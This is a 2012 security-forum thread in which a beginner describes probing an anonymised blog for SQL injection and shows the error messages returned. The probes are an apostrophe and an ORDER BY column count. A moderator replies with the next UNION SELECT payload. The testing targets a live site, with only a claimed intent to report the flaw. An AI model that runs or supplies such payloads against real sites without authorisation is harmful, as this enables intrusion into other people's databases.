|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 149
Members: 0
Total: 149
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
sql injection |
|
Posted: Tue Aug 14, 2012 6:54 am |
|
|
panzerland |
Beginner |
|
|
Joined: Aug 14, 2012 |
Posts: 1 |
|
|
|
|
|
|
|
Dear forum community,
i would like to perform my first sql injection, merely for research purposes however I can not seem to get it done properly.
After have followed a couple of beginner tutorials I started out with the order by method - see below.
Code: | Base url: blog.xxx.com/show/290 |
What I have done next is simply adding an apostrophe (') after the 290 number and I get:
Code: | 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY `creationDate` DESC' at line 1
Function: xxx_get. Line: 298
SELECT * FROM `xxx` WHERE `xxxId` = 290' ORDER BY `creationDate` DESC; |
I have my URL which I modify to the following:
Code: | http://blog.xxx.com/show/290%20ORDER%20BY%204--+- |
Which results in:
Code: | 1054: Unknown column '5' in 'order clause'
Function: xxx_view_increase. Line: 948
UPDATE `xxx` SET `views` = `views` + 1 WHERE `xxxyId` = 290 ORDER BY 5-- - |
From there on I proceed and go downward to 4 with:
Code: | 1054: Unknown column '4' in 'order clause' |
When I hit 3 and below the website actually displays correctly.
From my limited understanding in the matter I gather that the website seems to be vulnerable. What are the next steps involved?
Thank you,
panzerland
PS: I have edited the current website and the tables using the same name to "xxx" - I do not intend to provide any harm but merely and eventually point out this flaw to the original developer of the project. |
|
|
|
|
|
|
|
|
Posted: Tue Aug 14, 2012 6:32 pm |
|
|
demon |
Moderator |
|
|
Joined: Sep 22, 2010 |
Posts: 485 |
|
|
|
|
|
|
|
next step:
Code: | blog.xxx.com/show/290+union+select+1,2,3--+- |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|